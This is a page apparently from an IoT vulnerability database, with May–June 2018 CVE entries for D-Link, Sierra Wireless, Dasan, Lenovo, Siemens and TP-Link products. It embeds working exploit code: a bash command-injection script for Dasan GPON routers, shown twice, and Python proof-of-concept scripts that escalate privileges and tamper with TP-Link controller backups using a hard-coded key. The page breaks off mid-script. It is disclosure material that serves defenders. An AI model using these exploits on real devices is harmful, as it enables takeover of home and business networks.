VARIoT IoT vulnerabilities database


VAR-201805-0704 CVE-2018-10747 D-Link DSL-3782 EU Buffer error vulnerability CVSS V2: 9.0
CVSS V3: 8.8
Severity: HIGH
An issue was discovered on D-Link DSL-3782 EU 1.01 devices. An authenticated user can pass a long buffer as an 'unset' parameter to the '/userfs/bin/tcapi' binary (in the Diagnostics component) using the 'unset <node_name>' function and cause memory corruption. Furthermore, it is possible to redirect the flow of the program and execute arbitrary code. D-Link DSL-3782 EU contains a buffer error vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). D-Link DSL-3782 is a wireless router product from D-Link. A buffer overflow vulnerability exists in the /userfs/bin/tcapi binary in D-Link DSL-3782.
VAR-201805-0707 CVE-2018-10750 D-Link DSL-3782 EU Buffer error vulnerability CVSS V2: 9.3
CVSS V3: 8.8
Severity: HIGH
An issue was discovered on D-Link DSL-3782 EU 1.01 devices. An authenticated user can pass a long buffer as a 'staticGet' parameter to the '/userfs/bin/tcapi' binary (in the Diagnostics component) using the 'staticGet <node_name attr>' function and cause memory corruption. Furthermore, it is possible to redirect the flow of the program and execute arbitrary code. D-Link DSL-3782 EU contains a buffer error vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). D-Link DSL-3782 is a wireless router product from D-Link. A buffer overflow vulnerability exists in the /userfs/bin/tcapi binary in D-Link DSL-3782 EU 1.01.
VAR-201805-0705 CVE-2018-10748 D-Link DSL-3782 EU Buffer error vulnerability CVSS V2: 9.0
CVSS V3: 8.8
Severity: HIGH
An issue was discovered on D-Link DSL-3782 EU 1.01 devices. An authenticated user can pass a long buffer as a 'show' parameter to the '/userfs/bin/tcapi' binary (in the Diagnostics component) using the 'show <node_name>' function and cause memory corruption. Furthermore, it is possible to redirect the flow of the program and execute arbitrary code. D-Link DSL-3782 EU contains a buffer error vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). D-Link DSL-3782 is a wireless router product from D-Link. A buffer overflow vulnerability exists in the /userfs/bin/tcapi binary in D-Link DSL-3782.
VAR-201805-0371 CVE-2018-10251 Multiple Sierra Wireless routers: vulnerabilities related to authorization, authority, and access control in firmware CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
A vulnerability in Sierra Wireless AirLink GX400, GX440, ES440, and LS300 routers with firmware before 4.4.7 and GX450, ES450, RV50, RV50X, MP70, and MP70E routers with firmware before 4.9.3 could allow an unauthenticated remote attacker to execute arbitrary code and gain full control of an affected system, including issuing commands with root privileges. The firmware of multiple Sierra Wireless routers contains vulnerabilities related to authorization, authority, and access control. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Sierra Wireless AirLink GX400 and others are router products of Sierra Wireless, Canada. There are security holes in several Sierra Wireless products. Sierra Wireless AirLink GX400 and so on are router products of the Canadian Sierra Wireless company. The following products and versions are affected: Sierra Wireless AirLink GX400 with firmware prior to 4.4.7; Sierra Wireless AirLink GX440 with firmware prior to 4.4.7; Sierra Wireless AirLink ES440 with firmware prior to 4.4.7; Sierra Wireless AirLink LS300 with firmware prior to 4.9.3; Sierra Wireless AirLink GX450 with firmware prior to 4.9.3; Sierra Wireless AirLink ES450 with firmware prior to 4.9.3; Sierra Wireless AirLink RV50 with firmware prior to 4.9.3; Sierra Wireless AirLink RV50X with firmware prior to 4.9.3; Sierra Wireless AirLink MP70 with firmware prior to 4.9.3; Sierra Wireless AirLink MP70E with firmware prior to 4.9.3.
VAR-201805-0208 CVE-2017-15043 Multiple Sierra Wireless routers: vulnerability related to input validation in firmware CVSS V2: 9.0
CVSS V3: 8.8
Severity: HIGH
A vulnerability in Sierra Wireless AirLink GX400, GX440, ES440, and LS300 routers with firmware before 4.4.5 and GX450, ES450, RV50, RV50X, MP70, and MP70E routers with firmware before 4.9 could allow an authenticated remote attacker to execute arbitrary code and gain full control of an affected system, including issuing commands with root privileges. This vulnerability is due to insufficient input validation on user-controlled input in an HTTP request to the targeted device. An attacker in possession of router login credentials could exploit this vulnerability by sending a crafted HTTP request to an affected system. The firmware of multiple Sierra Wireless routers contains a vulnerability related to input validation. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Sierra Wireless AirLink GX400 and others are router products of Sierra Wireless, Canada.
VAR-201805-0232 CVE-2018-10641 D-Link DIR-601 Vulnerabilities related to certificate and password management CVSS V2: 6.8
CVSS V3: 8.1
Severity: HIGH
D-Link DIR-601 A1 1.02NA devices do not require the old password for a password change, which occurs in cleartext. D-Link DIR-601 contains vulnerabilities related to certificate and password management. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). D-Link DIR-601 is a wireless router product from D-Link. A security vulnerability exists in the D-Link DIR-601 A1 1.02NA release, caused by the fact that the user does not need the current password when changing the password and the program passes the new username and password in clear text. An attacker could exploit the vulnerability to obtain information by intercepting passed parameters. There is a security vulnerability in D-Link DIR-601 A1 version 1.02NA.

------------------------------------------
[Additional Information]
Insecure Authentication Practices in D-LINK DIR-601 Router, Hardware version A1, Firmware Version 1.02NA. When logging into the router, the authentication module passes the username and password BASE64 encoded rather than encrypted. There is also no support for HTTPS connections to the router. Due to no schedule viability, D-Link asks that two items are mentioned in the disclosure: a) For this out-of-service router, users are encouraged to use DD-WRT firmware from <http://www.dd-wrt.com/site/support/router-database>; b) They can contact support@dlink.com for the latest information on updates.

------------------------------------------
[VulnerabilityType Other]
Weak Authentication and No HTTPS support

------------------------------------------
[Vendor of Product]
D-Link

------------------------------------------
[Affected Product Code Base]
DIR 601 - Hardware A1, Firmware 1.02NA

------------------------------------------
[Affected Component]
Login, Password Changing

------------------------------------------
[Attack Type]
Context-dependent

------------------------------------------
[Impact Information Disclosure]
true

------------------------------------------
[Attack Vectors]
To exploit this, an attacker must have a proxy or man-in-the-middle attack completed and be able to discern the URLs to intercept passed parameters.

------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
true

------------------------------------------
[Remediation]
Due to no schedule viability, D-Link asks that two items are mentioned in the disclosure: a) For this out-of-service router, users are encouraged to use DD-WRT firmware; b) They can contact support@dlink.com for the latest information on updates.

------------------------------------------
[References]
http://us.dlink.com/security-advisories/
https://advancedpersistentsecurity.net/cve-2018-10641/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10641

Joe Gray
VAR-201805-0262 CVE-2018-10561 Dasan GPON home router Authentication vulnerability CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending "?images" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device. Dasan GPON home routers contain an authentication vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). An attacker could bypass authentication by adding '?images' to any of the device's URLs. Multiple Dasan GPON routers are prone to an authentication-bypass vulnerability and a command-injection vulnerability. An attacker can exploit these issues to bypass authentication or execute arbitrary commands in the context of the affected device.

#!/bin/bash
echo "[+] Sending the Command… "
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting…"
sleep 3
echo "[+] Retrieving the output…"
curl -k $1/diag.html?images/ 2>/dev/null | grep 'diag_result = ' | sed -e 's/\\n/\n/g'
VAR-201805-0263 CVE-2018-10562 Dasan GPON home routers Command injection vulnerability CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output. Dasan GPON home routers contain a command injection vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). An attacker could use the vulnerability to execute a command and retrieve the output by sending a diag_action=ping request with the 'dest_host' parameter to the GponForm/diag_Form URI. Multiple Dasan GPON routers are prone to an authentication-bypass vulnerability and a command-injection vulnerability. An attacker can exploit these issues to bypass authentication or execute arbitrary commands in the context of the affected device.

#!/bin/bash
echo "[+] Sending the Command… "
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting…"
sleep 3
echo "[+] Retrieving the output…"
curl -k $1/diag.html?images/ 2>/dev/null | grep 'diag_result = ' | sed -e 's/\\n/\n/g'
VAR-201805-0276 CVE-2018-10355 Trend Micro Email Encryption Gateway Vulnerabilities related to certificate and password management CVSS V2: 1.9
CVSS V3: 7.0
Severity: HIGH
An authentication weakness vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to recover user passwords on vulnerable installations due to a flaw in the DBCrypto class. An attacker must first obtain access to the user database on the target system in order to exploit this vulnerability. When storing user passwords, the process stores them in a recoverable format using a hard-coded key. An attacker can then leverage this vulnerability to decrypt existing passwords. Trend Micro Email Encryption Gateway is also reported to be prone to: 1. multiple SQL-injection vulnerabilities; 2. a command-injection vulnerability; 3. an insecure authentication weakness. Exploiting these issues could allow an attacker to access or modify data, exploit latent vulnerabilities in the underlying database, execute arbitrary commands, bypass the authentication mechanism, execute arbitrary code and obtain sensitive information. This may aid in further attacks.
VAR-201806-1464 CVE-2018-4220 Apple Swift: Swift for Ubuntu component vulnerable to arbitrary code execution in a privileged context CVSS V2: 9.3
CVSS V3: 8.8
Severity: HIGH
An issue was discovered in certain Apple products. Swift before 4.1.1 Security Update 2018-001 is affected. The issue involves the "Swift for Ubuntu" component. It allows attackers to execute arbitrary code in a privileged context because write and execute permissions are enabled during library loading. Apple Swift is prone to an arbitrary code-execution vulnerability. Failed attempts will likely cause a denial-of-service condition. Apple Swift is a programming language for macOS, iOS, watchOS and tvOS developed by Apple. This issue was addressed with improved permissions. Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 and the Swift announcements section on the forum: https://forums.swift.org/c/general-announce This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
VAR-201805-0936 CVE-2018-9063 Lenovo System Update Buffer error vulnerability CVSS V2: 4.6
CVSS V3: 7.8
Severity: HIGH
MapDrv (C:\Program Files\Lenovo\System Update\mapdrv.exe) in Lenovo System Update versions earlier than 5.07.0072 contains a local vulnerability where an attacker entering a very large user ID or password can overrun the program's buffer, causing undefined behaviors, such as execution of arbitrary code. No additional privilege is granted to the attacker beyond what is already possessed to run MapDrv. Lenovo System Update contains a buffer error vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Lenovo System Update is prone to a local buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it into an insufficiently sized buffer. Successful exploits may allow attackers to execute arbitrary code with elevated privileges. Failed exploits may result in denial-of-service conditions. Lenovo System Update is a set of automatic system update tools from Lenovo in China, which includes device driver updates, Windows system patch updates, etc.
Document Title:
===============
Lenovo SU v5.07 - Buffer Overflow & Code Execution Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2131
Lenovo Security ID: LEN-19625
https://nvd.nist.gov/vuln/detail/CVE-2018-9063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9063

Acknowledgements:
https://support.lenovo.com/us/fr/solutions/len-19625

News & Press References:
https://www.securityweek.com/lenovo-patches-secure-boot-vulnerability-servers
https://securityaffairs.co/wordpress/72335/security/lenovo-security-updates.html
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-9063

CVE-ID:
=======
CVE-2018-9063

Release Date:
=============
2018-07-12

Vulnerability Laboratory ID (VL-ID):
====================================
2131

Common Vulnerability Scoring System:
====================================
7.8

Vulnerability Class:
====================
Buffer Overflow

Current Estimated Price:
========================
4.000€ - 5.000€

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a local buffer overflow vulnerability in the official Lenovo SU v5.7.x & v5.6.x software.
Vulnerability Disclosure Timeline:
==================================
2018-05-03: Release Date (Lenovo)
2018-07-12: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Lenovo
Product: SU (MapDrv - mapdrv.exe) 5.7.19, 5.6.34, 5.6.0.28 & 5.6.0.27

Exploitation Technique:
=======================
Local

Severity Level:
===============
High

Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Responsible Disclosure Program

Technical Details & Description:
================================
A local buffer overflow and arbitrary code execution has been discovered in the official Lenovo SU v5.7.x & v5.6.x software. The vulnerability allows an attacker to overwrite the active registers of the process and compromise the affected software by gaining higher system access privileges. Exploitation of the local buffer overflow vulnerability requires no user interaction and system user process privileges of the driver. Successful exploitation of the buffer overflow vulnerability results in a compromise of the local system process or affected computer system.

Vulnerable Driver:
[+] MapDrv

Affected Process:
[+] mapdrv.exe

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by local attackers with system process privileges and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.

--- Debug Error Exception Session Log (Exception) ---
(d8c.1988): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=029ab7a0 ebx=0031fe05 ecx=00000041 edx=fd974860 esi=029a9d70 edi=0031fd04
eip=00a256b3 esp=0031e54c ebp=0031fc70 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
*** ERROR: Module load completed but symbols could not be loaded for image00a20000
image00a20000+0x56b3:
00a256b3 66890c02 mov word ptr [edx+eax],cx ds:0023:00320000=0000

--- Debug Session Log [Exception Analysis] ---
FAULTING_IP:
image00a20000+56b3
00a256b3 66890c02 mov word ptr [edx+eax],cx
EXCEPTION_RECORD: ffffffff -- (.exr ffffffffffffffff)
ExceptionAddress: 00a256b3 (image00a20000+0x000056b3)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 00320000
Attempt to write to address 00320000
FAULTING_THREAD: 00001988
PROCESS_NAME: image00a20000
FAULTING_MODULE: 77ab0000 ntdll
DEBUG_FLR_IMAGE_TIMESTAMP: 594b6578
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
WRITE_ADDRESS: 00320000
BUGCHECK_STR: ACCESS_VIOLATION
IP_ON_HEAP: 00410041
The fault address in not in any loaded module, please check your build's rebase log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may contain the address if it were loaded.
DEFAULT_BUCKET_ID: WRONG_SYMBOLS
FRAME ONE INVALID: 1800200000000a
LAST_CONTROL_TRANSFER: from 00410041 to 00a256b3
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0031fc70 00410041 00410041 00410041 00410041 image00a20000+0x56b3
0031fc74 00410041 00410041 00410041 00410041 0x410041
0031fc78 00410041 00410041 00410041 00410041 0x410041
0031fc7c 00410041 00410041 00410041 00410041 0x410041
0031fc80 00410041 00410041 00410041 00410041 0x410041
0031fc84 00410041 00410041 00410041 00410041 0x410041
0031fc88 00410041 00410041 00410041 00410041 0x410041
0031fc8c 00410041 00410041 00410041 00410041 0x410041
0031fc90 00410041 00410041 00410041 00410041 0x410041
0031fc94 00410041 00410041 00410041 00410041 0x410041
0031fc98 00410041 00410041 00410041 00410041 0x410041
0031fc9c 00410041 00410041 00410041 00410041 0x410041
0031fca0 00410041 00410041 00410041 00410041 0x410041
0031fca4 00410041 00410041 00410041 00410041 0x410041
0031fca8 00410041 00410041 00410041 00410041 0x410041
0031fcac 00410041 00410041 00410041 00410041 0x410041
0031fcb0 00410041 00410041 00410041 00410041 0x410041
0031fcb4 00410041 00410041 00410041 00410041 0x410041
0031fcb8 00410041 00410041 00410041 00410041 0x410041
0031fcbc 00410041 00410041 00410041 00410041 0x410041
0031fcc0 00410041 00410041 00410041 00410041 0x410041
0031fcc4 00410041 00410041 00410041 00410041 0x410041
0031fcc8 00410041 00410041 00410041 00410041 0x410041
0031fccc 00410041 00410041 00410041 00410041 0x410041
0031fcd0 00410041 00410041 00410041 00410041 0x410041
0031fcd4 00410041 00410041 00410041 00410041 0x410041
0031fcd8 00410041 00410041 00410041 00410041 0x410041
0031fcdc 00410041 00410041 00410041 00410041 0x410041
0031fce0 00410041 00410041 00410041 00410041 0x410041
0031fce4 00410041 00410041 00410041 00410041 0x410041
0031fce8 00410041 00410041 00410041 00410041 0x410041
0031fcec 00410041 00410041 00410041 00410041 0x410041
0031fcf0 00410041 00410041 00410041 00410041 0x410041
0031fcf4 00410041 00410041 00410041 00410041 0x410041
0031fcf8 00410041 00410041 00410041 00410041 0x410041
0031fcfc 00410041 00410041 00410041 00410041 0x410041
0031fd00 00410041 00410041 00410041 00410041 0x410041
0031fd04 00410041 00410041 00410041 00410041 0x410041
0031fd08 00410041 00410041 00410041 00410041 0x410041
0031fd0c 00410041 00410041 00410041 00410041 0x410041
0031fd10 00410041 00410041 00410041 00410041 0x410041
0031fd14 00410041 00410041 00410041 00410041 0x410041
0031fd18 00410041 00410041 00410041 00410041 0x410041
0031fd1c 00410041 00410041 00410041 00410041 0x410041
0031fd20 00410041 00410041 00410041 00410041 0x410041
0031fd24 00410041 00410041 00410041 00410041 0x410041
0031fd28 00410041 00410041 00410041 00410041 0x410041
0031fd2c 00410041 00410041 00410041 00410041 0x410041
0031fd30 00410041 00410041 00410041 00410041 0x410041
0031fd34 00410041 00410041 00410041 00410041 0x410041
0031fd38 00410041 00410041 00410041 00410041 0x410041
0031fd3c 00410041 00410041 00410041 00410041 0x410041
0031fd40 00410041 00410041 00410041 00410041 0x410041
0031fd44 00410041 00410041 00410041 00410041 0x410041
0031fd48 00410041 00410041 00410041 00410041 0x410041
0031fd4c 00410041 00410041 00410041 00410041 0x410041
0031fd50 00410041 00410041 00410041 00410041 0x410041
0031fd54 00410041 00410041 00410041 00410041 0x410041
0031fd58 00410041 00410041 00410041 00410041 0x410041
0031fd5c 00410041 00410041 00410041 00410041 0x410041
0031fd60 00410041 00410041 00410041 00410041 0x410041
0031fd64 00410041 00410041 00410041 00410041 0x410041
0031fd68 00410041 00410041 00410041 00410041 0x410041
0031fd6c 00410041 00410041 00410041 00410041 0x410041
0031fd70 00410041 00410041 00410041 00410041 0x410041
0031fd74 00410041 00410041 00410041 00410041 0x410041
0031fd78 00410041 00410041 00410041 00410041 0x410041
0031fd7c 00410041 00410041 00410041 00410041 0x410041
0031fd80 00410041 00410041 00410041 00410041 0x410041
0031fd84 00410041 00410041 00410041 00410041 0x410041
0031fd88 00410041 00410041 00410041 00410041 0x410041
0031fd8c 00410041 00410041 00410041 00410041 0x410041
0031fd90 00410041 00410041 00410041 00410041 0x410041
0031fd94 00410041 00410041 00410041 00410041 0x410041
0031fd98 00410041 00410041 00410041 00410041 0x410041

PRIMARY_PROBLEM_CLASS: STACK_CORRUPTION
FOLLOWUP_IP:
image00a20000+56b3
00a256b3 66890c02 mov word ptr [edx+eax],cx
SYMBOL_STACK_INDEX: 0
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: image00a20000
IMAGE_NAME: image00a20000
SYMBOL_NAME: image00a20000+56b3
STACK_COMMAND: ~0s ; kb
BUCKET_ID: WRONG_SYMBOLS
Followup: MachineOwner
---------
0:000> lmvm image00a20000
start end module name
00a20000 00bd2000 image00a20000 (no symbols)
Loaded symbol image file: C:\Program Files\Lenovo\System Update\mapdrv.exe
Image path: image00a20000
Image name: image00a20000
Timestamp: Wed Jun 21 23:36:40 2017 (594B6578)
CheckSum: 001BA113
ImageSize: 001B2000
File version: 1.0.0.1
Product version: 1.0.0.1
File flags: 0 (Mask 3F)
File OS: 4 Unknown Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04b0
ProductName: Map Network Drive
InternalName: mapdrv
OriginalFilename: mapdrv.exe
ProductVersion: 1, 0, 0, 1
FileVersion: 1, 0, 0, 1
FileDescription: Map Network Drive Application
LegalCopyright: Copyright Lenovo 2005, 2006, all rights reserved. Copyright IBM Corporation 1996-2005, all rights reserved.

Solution - Fix & Patch:
=======================
Update Lenovo System Update to version 5.07.0072 or later. You can determine the currently installed version by opening Lenovo System Update, clicking on the green question mark in the top right corner and then selecting "About." Lenovo System Update can be updated by choosing either of the following methods: Lenovo System Update automatically checks for a later version whenever the application is run. Click OK when prompted that a new version is available.

Credits & Authors:
==================
S.AbenMassaoud - https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty.
Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material, contact (admin@ or research@) to ask for permission.

Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
VAR-201805-1130 CVE-2018-4849 Siveillance VMS Video for Android and iOS: vulnerabilities related to certificate validation CVSS V2: 5.8
CVSS V3: 7.4
Severity: HIGH
A vulnerability has been identified in Siveillance VMS Video for Android (all versions < V12.1a (2018 R1)) and Siveillance VMS Video for iOS (all versions < V12.1a (2018 R1)). Improper certificate validation could allow an attacker in a privileged network position to read data from and write data to the encrypted communication channel between the app and a server. The vulnerability could be exploited by an attacker in a privileged network position that allows intercepting the communication channel between the affected app and a server (such as a man-in-the-middle). Furthermore, the attacker must be able to generate a certificate that, for the validation algorithm, yields a checksum identical to that of a trusted certificate. Successful exploitation requires no user interaction. The vulnerability could allow reading data from and writing data to the encrypted communication channel between the app and a server, impacting the communication's confidentiality and integrity. At the time of advisory publication no public exploitation of this security vulnerability was known. Siemens confirms the security vulnerability and provides mitigations to resolve the security issue. Siemens Siveillance VMS Video for Android is Android-based video management software from Siemens. The vulnerability stems from the program's failure to properly verify the certificate. Successfully exploiting this issue allows attackers to perform man-in-the-middle attacks and bypass certain security restrictions.
VAR-201805-0360 CVE-2018-10166 TP-Link EAP Controller and Omada Controller Vulnerable to cross-site request forgery CVSS V2: 6.8
CVSS V3: 8.8
Severity: HIGH
The web management interface in the TP-Link EAP Controller and Omada Controller versions 2.5.4_Windows/2.6.0_Windows does not have Anti-CSRF tokens in any forms. This would allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain. This is fixed in version 2.6.1_Windows. TP-Link EAP Controller and Omada Controller contain a cross-site request forgery vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). TP-Link EAP Controller and Omada Controller are software used by TP-LINK to remotely control wireless AP (access point) devices. The vulnerability stems from the fact that the program does not have any form of anti-cross-site request forgery token. TP-Link EAP Controller is also reported to be prone to the following issues: 1. A privilege-escalation vulnerability 2. A hard-coded cryptographic key vulnerability 3. A cross-site request-forgery vulnerability 4. Multiple HTML-injection vulnerabilities. An attacker may leverage these issues to gain elevated privileges, perform unauthorized actions and gain access to the affected application, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.

1. **Advisory Information**
Title: TP-Link EAP Controller Multiple Vulnerabilities
Advisory ID: CORE-2018-0001
Advisory URL: http://www.coresecurity.com/advisories/tp-link-eap-controller-multiple-vulnerabilities
Date published: 2018-05-03
Date of last update: 2018-04-17
Vendors contacted: TP-Link
Release mode: Coordinated release

2. **Vulnerability Information**
Class: Improper Privilege Management [CWE-269], Use of Hard-coded Cryptographic Key [CWE-321], Cross-Site Request Forgery [CWE-352], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-10168, CVE-2018-10167, CVE-2018-10166, CVE-2018-10165, CVE-2018-10164

3. It allows you to centrally manage your EAP devices using a Web browser. Due to the use of a hard-coded cryptographic key, the backup file of the Web application can be decrypted, modified and restored back. Also, the Web application does not have Cross-Site Request Forgery protection and, finally, two stored Cross-Site Scripting vulnerabilities were found.

4. **Vulnerable Packages**
. TP-Link EAP Controller_V2.5.4_Windows
. TP-Link Omada Controller_V2.6.0_Windows
Other products and versions might be affected, but they were not tested.

5. **Vendor Information, Solutions and Workarounds**
TP-Link released Omada Controller_V2.6.1_Windows [2] that fixes the reported issues.

6. **Credits**
This vulnerability was discovered and researched by Julian Muñoz from Core Security Exploits QA. The publication of this advisory was coordinated by Alberto Solino and Leandro Cuozzo from Core Advisories Team.

7. **Technical Description / Proof of Concept Code**
TP-Link EAP Controller doesn't have any role control on the Web app API; only the application GUI seems to restrict low-level users (observer) from changing settings. The vulnerability presented in 7.1 shows how a low privilege user (observer) can make a request and create a new administrator user. In 7.2 we show that the software uses a hardcoded key to encrypt the Web application's backup file. An attacker possessing that key and knowing the encryption algorithm could decrypt and modify the backup file. Forcing a user to restore this backup (using 7.3) can give us total control over the managed devices. Finally, we discovered two Cross-Site Scripting issues, one on the creation of a local user in the parameter userName (7.4) and the other one abusing the implementation of portalPictureUpload (7.5).

7.1. **Privilege escalation from Observer to Administrator** [CVE-2018-10168]
The software does not control privileges on the usage of the Web API, allowing a low privilege user to make any request as an Administrator. The following PoC shows the creation of a new Administrator, by just having the session cookie of an observer (lowest privilege user):

/-----
import requests

session = requests.Session()
session.trust_env = False
tpeap_session_id = "80ab613a-590c-47ac-a2d6-f2949a0e9daa"  # observer session_id
cookie = {'TPEAP_SESSIONID': tpeap_session_id}
data = {"name": "coresecurity", "roleId": "59fb411ebb62eef169069ac3", "password": "123456", "email": "fakemail@gmail.com", "roleName": "administrator"}
# create user
create_user_response = session.post('https://EAP_CONTROLER_IP:8043/user/addUser', cookies=cookie, data=data, verify=False)
-----/

The roleId parameter can be discovered in 7.2 by decrypting the backup file.

7.2. **Download, Decrypt and Restore the web app backup file** [CVE-2018-10167]
As described, the whole Web API does not restrict low privilege users, so an observer can make a request to download the web app backup file. The following XML is part of the decrypted backup file; modifying those fields would give us control over the EAP device, since we can inject a user and password for the user account and enable SSH on the device.

/-----
<useraccount>
{
  "id" : "5a09fad8bb62eef169069ad3",
  "userName" : "attacker",
  "password" : "1234567",
  "site" : "Default",
  "key" : "userAccount"
}
</useraccount>
<ssh>
{
  "id" : "59fb411fbb62eef169069ac7",
  "sshserverPort" : 22,
  "sshenable" : true,
  "site" : "Default",
  "key" : "ssh"
}
</ssh>
-----/

The following code shows how this process is done, using an observer's session_id. First we get the backup file, decrypt it using the hard-coded key, then we modify it and finally upload it back to the server.

/-----
# -*- coding: utf-8 -*-
import requests
import codecs

key = "Ei2HNryt8ysSdRRI54XNQHBEbOIRqNjQgYxsTmuW3srSVRVFyLh8mwvhBLPFQph3ecDMLnDtjDUdrUwt7oTsJuYl72hXESNiD6jFIQCtQN1unsmn" \
      "3JXjeYwGJ55pqTkVyN2OOm3vekF6G1LM4t3kiiG4lGwbxG4CG1s5Sli7gcINFBOLXQnPpsQNWDmPbOm74mE7eyR3L7tk8tUhI17FLKm11hrrd1ck" \
      "74bMw3VYSK3X5RrDgXelewMU6o1tJ3iX"

def init_key(secret_key):
    key_in_bytes = map(ord, secret_key)
    number_list = range(0, 256)
    j = 0
    for i, val in enumerate(number_list):
        j = j + number_list[i] + key_in_bytes[i] & 0xFF
        temp = number_list[i]
        number_list[i] = number_list[j]
        number_list[j] = temp
    return number_list

def encrypt(data, key):
    key = init_key(key)
    input = [x for x in data]
    output = []
    for x, elem in enumerate(data):
        i = 0
        j = 0
        i = (i + 1) % 256
        j = (j + key[i]) % 256
        temp = key[i]
        key[i] = key[j]
        key[j] = temp
        t = (key[i] + key[j] % 256) % 256
        iY = key[t]
        iCY = iY
        output.append(chr(ord(input[x]) ^ iCY))
    ret = ''.join(output)
    return ret

session = requests.Session()
session.trust_env = False
tpeap_session_id = "80ab613a-590c-47ac-a2d6-f2949a0e9daa"
cookie = {'TPEAP_SESSIONID': tpeap_session_id}
# get backup file
get_backup_response = session.get('https://EAP_CONTROLER_IP:8043/globalsetting/backup', cookies=cookie, verify=False)
# decrypt backup file
decrypted_backup = encrypt(unicode(get_backup_response.content, 'utf-8'), key)
# modify decrypted backup file
patched_backup = decrypted_backup.replace('normaluser', 'attacker')
# encrypt the file and save it
path_to_write
